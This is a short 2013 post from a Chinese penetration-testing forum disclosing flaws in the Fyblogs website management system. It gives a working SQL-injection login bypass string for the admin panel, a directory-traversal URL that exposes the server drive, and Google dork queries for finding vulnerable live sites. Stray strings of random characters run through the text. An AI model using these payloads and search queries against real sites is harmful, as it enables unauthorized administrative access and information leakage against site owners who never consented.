中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]

作者: admin    时间: 2013-3-14 20:17
标题: Fyblogs网站管理系统漏洞
后台万能密码 'or'='or'
% ?# G4 Z8 f) C: p' z9 ^3 z4 O! `  W% l7 ~, B. ?
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
" r3 @4 u: Q2 F6 }8 Madmin/uploadfile.asp?currentFolder=/upfiles/../* v$ E8 s( H# o$ S2 y

# g# \' E, j# Z6 J+ W漏洞证明:
: f* Z2 I$ H; s4 T8 J* J+ _. C- Q" |% d. D; v. s( z
谷歌:inurl:type.asp?id=1 新闻中心
3 C3 Y  A$ ]* r- H或者 :inurl:download_ok.asp?
% n2 u6 p: h% Z# d0 _$ i7 r9 L7 W0 R) ^; m+ k1 r2 {





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2